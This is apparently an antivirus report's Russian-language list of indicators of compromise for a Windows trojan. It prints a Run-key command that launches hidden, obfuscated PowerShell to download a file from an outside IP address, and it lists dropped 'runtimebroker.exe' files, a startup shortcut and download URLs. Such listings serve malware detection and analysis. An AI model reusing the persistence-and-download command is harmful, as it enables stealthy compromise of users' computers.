Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Sound device' = 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nt...
- %APPDATA%\microsoft\windows\start menu\programs\startup\sound device.lnk
- (http://19#.#6.146.55/ru+nti+m+ebr+oke+r.exe
- http://19#.#6.146.55/api/getfile2
- %ALLUSERSPROFILE%\runtimebroker.exe
- %ALLUSERSPROFILE%\runtimebroker_new.exe
- %ALLUSERSPROFILE%\runtimebroker.exe
- %ALLUSERSPROFILE%\runtimebroker_new.exe
- %ALLUSERSPROFILE%\runtimebroker.exe
- '19#.#6.146.55':80
- http://19#.#6.146.55/Api/GetFile3
- '%ALLUSERSPROFILE%\runtimebroker.exe'
- '%ALLUSERSPROFILE%\runtimebroker_new.exe'
- '%ALLUSERSPROFILE%\runtimebroker.exe' ' (со скрытым окном)
- '%ALLUSERSPROFILE%\runtimebroker_new.exe' ' (со скрытым окном)